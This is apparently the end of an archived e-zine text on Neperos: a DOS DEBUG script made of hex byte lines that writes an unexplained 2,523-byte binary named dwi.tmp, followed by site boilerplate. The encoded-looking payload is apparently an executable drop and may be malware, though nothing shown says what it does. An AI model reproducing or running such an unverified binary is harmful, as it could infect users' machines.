db C4 F5 4A 11 28 06 97 15 36 1E 00 8F 4B 19 1A 85
db 14 EB 4B 09 5B 81 14 02 B7 E9 4B 09 2B 89 14 18
db A4 B9 4A 09 2B 8D 14 B8 80 1F 14 FE E9 FE E9 E2
db E9 78 96 02 A7 97 2B 17 17 42 04 22 BA 1C 04 22
db 96 1F 4A 07 1B AF 15 07 1B 9B 17 03 0A 11 28 6F
db 17 AE 8C 5D B6 69 13 1E 66 1D A6 85 55 69 B7 1E
db 7E 8E 8C 5D B6 45 36 1E 0A 9E 69 1F 14 08 F9 6D
db 21 16 F0 57 71 8D B5 20 E2 91 1B 17 17 6D 15 58
db 1B 1E E0 AF 4C 1D 16 02 97 52 98 13 14 1F 06 1E
db 66 1D A6 A8 8C 5C C4 CA E8 BF B0 BD B2 B3 B8 B5
db 1A 23 6C 84 41 F7 5C 65 16 89 FE 4D 28 11 AC A1
db AA AB A4 A9 A6 CA 2B 3F 3A 1D 70 9E 0B AF 4B 97
db 1B 29 1C 58 37 1E 0E 12 32 1E C0 DE 01 C6 99 93
db 36 CD C4 C9 A3 78 96 02 A7 97 1B 3F 17 42 50 29
db 1C 42 0E 13 2C 14 98 12 36 1E BE 16 0E 02 32 1F
db 18 12 00 EB 0B 20 6A 7D 11 B3 AA B2 4E 6C 17 1E
db F2 43 FF 19 AA C9 73 7D 19 46 4B F4 CC DA E3 A3
db 1A 20 66 1B 6C 85 77 39 0B 20 7E 9E 64 2B 14 6A
db 65 18 8C 7E 7E 62 8C 7E 7E 0C 62 69 11 85 77 21
db 18 A5 A8 A3 A2 AD A0 AE 88 13 28 08 F3 03 18 61
db 65 14 4E 4B 03 9F FD EB 0B 21 70 9E C7 CF 12 0D
db 0B 65 1D 6F 17 64 8C 7F F2 78 30 6F 17 B0 8C 7E
db 04 02 60 14 04 32 64 14 7E 60 64 2B 16 6B 29 14
db 8C 7E C6 8B 12 BB B6 77 6B 85 77 1D 6B 21 1C 85
db A2 F5 06 1D 6B 7D 1C B3 74 F5 1C AB A2 CD 43 E0
db 77 1D 70 8C C7 5F 12 FA F2 03 18 63 71 14 68 8D
db 14 54 5D 18 CB 0A 5C 55 A7 AB B6 BB 1C 29 1E 18
db B3 1E 64 1F 12 F0 F5 08 B2 F7 14 9E 50 59 1C 0D
db 3B 5D 1C 5D 45 15 1C 9D 16 59 45 14 50 49 1C AB
db A6 7D 1F 09 2B 51 1C B8 D1 48 90 18 A3 1E 64 3F
db 16 F0 F5 08 B2 F7 10 48 82 9F B4 45 36 1E 98 13
db 70 15 16 1C 50 75 1C 59 4D 14 98 13 48 14 F2 12
db 98 13 74 15 BA 7C 66 1B 6C 6B 65 14 8C 7E 30 77
db 97 6D 23 1E 62 21 1C 85 77 CE 51 1D A4 18 E5 3F
db FE 16 7E 9E 8C 7E 7E 46 8C 5C 04 33 18 1C 6A CF
db 1F 60 69 14 64 79 16 F8 5F CF D1 1A 66 1D B8 09
db 0B 69 1D 09 3B 6D 1D 85 77 77 6B 85 77 7F 15 09
db 0B 65 1D CF D5 1C C4 DC EA 1F A0 97 B8 8D AC 5F
db 94 D9 D0 F5 B6 F5 CA C9 48 B7 C6 D5 56 9D FE F7
db C4 F7 FC D7 DC 5F 94 D7 C2 F5 F0 F7 DC FB 16 B3
db C4 FB FC C7 DC C3 FE 5F 98 FB D4 D3 DA CD FE CD
db 16 B1 84 83 4A 99 88 85 16 85 57 05 02 AD C8 F5
db 58 F3 DC 5F D2 D5 DC C3 56 D9 D4 F5 D8 CF FE 47
db 56 ED C8 F5 56 97 B8 8D 54 5F A4 C1 FC 51 F2 D5
db 56 C3 C8 F7 C6 CD CA D1 56 DB FC F7 56 DD 56 97
db D4 C5 CA 5F 56 B1 C4 C3 DE C1 F8 F9 56 5F 84 D7
db C4 C1 FE 5D 0C 0B B8 D5 CE C7 4E 5F F8 D5 56 DD
db FE 5F BA CD F2 F5 CE D5 CA F7 56 91 F2 DD DA D3
db C4 F7 C4 5F C6 DD FA D5 56 5F C6 DD DE 5F C4 F7
db 4A 43 4A 5F 56 ED C8 F5 58 FB DC 5F 56 C3 C8 F7
db 56 D1 C8 CD CA D1 56 5F FE C1 56 DB DC 05 02 FB
db FC C3 CA CD CA D1 56 F7 C6 DD FE 5F D2 F5 CE C7
db F0 CF C4 F7 56 D3 C8 FB 56 DD 56 F1 C6 CD CE D5
db 4E 5F 58 D9 FC EB 4E 5F C6 D5 E4 47 56 D3 F2 CD
db DC C3 DE F9 56 D7 C8 C3 58 F7 56 C7 DC F7 56 D3
db F2 CD DC C3 DE F9 0C 0B FC F9 DC 5F B8 CD CA D7
db C8 F1 F0 5D 56 5F 46 DD CA D7 56 ED C8 F5 58 FB
db DC 5F DE DD CC C3 56 FB C4 D1 C6 F7 56 F1 DC 51
db F2 D5 56 ED C8 F5 F2 5F DA FB C4 D5 CA D7 F0 5D
db 44 05 02 56 76 18 88 77 91 6B 65 14 8C 7E 90 6F
db 13 9B 70 8C 25 85 77 99 B1 69 31 1C 64 17 12 09
db 3B 11 14 BD 19 7D 38 99 90 DA E7 A8 7E 9E 64 29
db 1E 6B 17 1C 8C 7F B0 69 31 1C 64 17 12 09 3B 11
db 14 7D 38 BD 09 99 90 DA E7 A8 90 75 22 E3 0A 93
db 8B 4F 08 93 3B 4F 08 75 16 8B 5F 02 93 8B 5F 02
db EB B6 3D 06 00 75 06 3B C3 8B CC EB 05 3B C3 B9

rcx
9db
n dwi.tmp
w
q
===========================================================================



loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT